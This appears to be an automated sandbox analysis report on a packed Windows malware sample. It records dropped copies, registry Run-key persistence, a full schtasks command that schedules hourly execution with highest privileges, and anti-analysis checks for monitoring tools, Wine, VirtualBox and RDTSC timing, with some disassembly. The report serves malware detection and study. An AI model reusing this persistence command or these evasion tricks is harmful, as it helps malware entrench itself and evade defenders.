            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dllJump to behavior
            Source: LisectAVT_2403002A_140.exeStatic file information: File size 2334728 > 1048576
            Source: LisectAVT_2403002A_140.exeStatic PE information: Raw size of yxaifgwn is bigger than: 0x100000 < 0x1a7600

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeUnpacked PE file: 0.2.LisectAVT_2403002A_140.exe.d20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW; vs :ER;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 5.2.MPGPH131.exe.a20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW; vs :ER;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 6.2.MPGPH131.exe.a20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW; vs :ER;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 7.2.RageMP131.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW; vs :ER;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 11.2.RageMP131.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW; vs :ER;.rsrc:W;.idata :W; :EW;yxaifgwn:EW;yvccconk:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: yvccconk
            Source: RageMP131.exe.0.drStatic PE information: real checksum: 0x23c767 should be: 0x23c76f
            Source: MPGPH131.exe.0.drStatic PE information: real checksum: 0x23c767 should be: 0x23c76f
            Source: LisectAVT_2403002A_140.exeStatic PE information: real checksum: 0x23c767 should be: 0x23c76f
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name:
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name: .idata
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name:
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name: yxaifgwn
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name: yvccconk
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: .idata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: yxaifgwn
            Source: RageMP131.exe.0.drStatic PE information: section name: yvccconk
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: yxaifgwn
            Source: MPGPH131.exe.0.drStatic PE information: section name: yvccconk
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C21BD push 6955E4D9h; mov dword ptr [esp], ecx0_2_012C21C2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C21BD push ecx; mov dword ptr [esp], 7BCBAC04h0_2_012C21E8
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C21BD push ecx; mov dword ptr [esp], eax0_2_012C21FA
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C2000 push eax; mov dword ptr [esp], 7F4E0ED2h0_2_012C2001
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C2000 push ebp; mov dword ptr [esp], 745DEF78h0_2_012C2016
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C2000 push 78960941h; mov dword ptr [esp], esi0_2_012C20EA
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C2000 push eax; mov dword ptr [esp], 5DEDB1E5h0_2_012C2115
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C2046 push 78960941h; mov dword ptr [esp], esi0_2_012C20EA
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_012C2046 push eax; mov dword ptr [esp], 5DEDB1E5h0_2_012C2115
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00DFFA97 push ecx; ret 0_2_00DFFAAA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC2046 push 78960941h; mov dword ptr [esp], esi5_2_00FC20EA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC2046 push eax; mov dword ptr [esp], 5DEDB1E5h5_2_00FC2115
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC2000 push eax; mov dword ptr [esp], 7F4E0ED2h5_2_00FC2001
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC2000 push ebp; mov dword ptr [esp], 745DEF78h5_2_00FC2016
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC2000 push 78960941h; mov dword ptr [esp], esi5_2_00FC20EA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC2000 push eax; mov dword ptr [esp], 5DEDB1E5h5_2_00FC2115
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC21BD push 6955E4D9h; mov dword ptr [esp], ecx5_2_00FC21C2
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC21BD push ecx; mov dword ptr [esp], 7BCBAC04h5_2_00FC21E8
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00FC21BD push ecx; mov dword ptr [esp], eax5_2_00FC21FA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00AFFA97 push ecx; ret 5_2_00AFFAAA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC2046 push 78960941h; mov dword ptr [esp], esi6_2_00FC20EA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC2046 push eax; mov dword ptr [esp], 5DEDB1E5h6_2_00FC2115
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC2000 push eax; mov dword ptr [esp], 7F4E0ED2h6_2_00FC2001
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC2000 push ebp; mov dword ptr [esp], 745DEF78h6_2_00FC2016
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC2000 push 78960941h; mov dword ptr [esp], esi6_2_00FC20EA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC2000 push eax; mov dword ptr [esp], 5DEDB1E5h6_2_00FC2115
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC21BD push 6955E4D9h; mov dword ptr [esp], ecx6_2_00FC21C2
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC21BD push ecx; mov dword ptr [esp], 7BCBAC04h6_2_00FC21E8
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00FC21BD push ecx; mov dword ptr [esp], eax6_2_00FC21FA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AFFA97 push ecx; ret 6_2_00AFFAAA
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_00862000 push eax; mov dword ptr [esp], 7F4E0ED2h7_2_00862001
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name: entropy: 7.988366600079935
            Source: LisectAVT_2403002A_140.exeStatic PE information: section name: yxaifgwn entropy: 7.949631188388849
            Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.988366600079935
            Source: RageMP131.exe.0.drStatic PE information: section name: yxaifgwn entropy: 7.949631188388849
            Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.988366600079935
            Source: MPGPH131.exe.0.drStatic PE information: section name: yxaifgwn entropy: 7.949631188388849
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_5-19710
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-20157
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_7-18161
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: E603D1 second address: E5FC69 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF158DB38F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add dword ptr [ebp+122D17BDh], edx 0x00000015 push dword ptr [ebp+122D0BF1h] 0x0000001b pushad 0x0000001c mov eax, dword ptr [ebp+122D2B70h] 0x00000022 mov eax, dword ptr [ebp+122D2BC8h] 0x00000028 popad 0x00000029 call dword ptr [ebp+122D17C2h] 0x0000002f pushad 0x00000030 jmp 00007FF158DB3909h 0x00000035 jmp 00007FF158DB3907h 0x0000003a xor eax, eax 0x0000003c stc 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jno 00007FF158DB38FEh 0x00000047 mov dword ptr [ebp+122D29E0h], eax 0x0000004d jmp 00007FF158DB3905h 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1FFBh], edi 0x0000005d jmp 00007FF158DB3909h 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 sub dword ptr [ebp+122D1FFBh], edx 0x0000006c lodsw 0x0000006e jmp 00007FF158DB3900h 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 or dword ptr [ebp+122D192Fh], esi 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 xor dword ptr [ebp+122D2850h], edi 0x00000087 jno 00007FF158DB390Ah 0x0000008d push eax 0x0000008e push eax 0x0000008f push edx 0x00000090 jmp 00007FF158DB3904h 0x00000095 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE0790 second address: FE07CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FF158548898h 0x0000000e push 00000000h 0x00000010 xor ecx, dword ptr [ebp+122D38B4h] 0x00000016 push 2D083B55h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF15854888Bh 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE07CC second address: FE07D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE09C8 second address: FE0A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF158548891h 0x0000000c popad 0x0000000d add dword ptr [esp], 326D3141h 0x00000014 mov ecx, dword ptr [ebp+122D2C74h] 0x0000001a xor dword ptr [ebp+122D1864h], ebx 0x00000020 push 00000003h 0x00000022 mov esi, dword ptr [ebp+122D1860h] 0x00000028 mov di, cx 0x0000002b push 00000000h 0x0000002d jmp 00007FF158548891h 0x00000032 push 00000003h 0x00000034 movzx edx, bx 0x00000037 push 679ED040h 0x0000003c push ecx 0x0000003d jmp 00007FF158548895h 0x00000042 pop ecx 0x00000043 add dword ptr [esp], 58612FC0h 0x0000004a and si, 2711h 0x0000004f lea ebx, dword ptr [ebp+1245468Ah] 0x00000055 jmp 00007FF158548892h 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jnc 00007FF158548886h 0x00000065 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE0A62 second address: FE0A6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF158DB38F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE0A6C second address: FE0A88 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF158548891h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE0B27 second address: FE0B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnc 00007FF158DB38F6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE0B3C second address: FE0B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548893h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF158548888h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 xor dword ptr [ebp+122D1BCFh], ebx 0x0000002d push 922D7AF7h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 pop eax 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE0B85 second address: FE0B8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FE0C7A second address: FE0C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF15854888Dh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FF1B5D second address: FF1B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FF1B63 second address: FF1B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFF4A1 second address: FFF4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007FF158DB38F6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFF4B5 second address: FFF4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFF4BA second address: FFF4D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3904h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFF4D4 second address: FFF4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF15854888Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FFF7AF second address: FFF7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
